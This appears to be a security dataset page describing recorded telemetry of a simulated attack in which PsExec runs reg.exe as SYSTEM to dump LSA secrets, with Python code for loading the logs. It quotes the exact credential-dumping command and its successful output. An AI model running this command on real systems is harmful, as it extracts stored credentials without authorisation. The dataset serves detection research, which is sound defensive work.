Psexec Reg LSA Secrets Dump

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/19

Modification Date

2020/10/19

Tactics

TA0006

Techniques

T1003.004

Tags

art.55295ab0-a703-433b-9ca4-ae13807de12f

Dataset Description

This dataset represents adversaries using psexec to run reg.exe as system and dump LSA secrets. Location HKLM\security\policy\secrets.

Simulation Metadata

Tools

type

Name

Module

Manual

Cmd

Cmd

Adversary View

C:\Users\wardog\Downloads\PSTools>PsExec.exe -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


The operation completed successfully.
reg exited on WORKSTATION5 with error code 0.

C:\Users\wardog\Downloads\PSTools>

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_psexec_lsa_secrets_dump.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)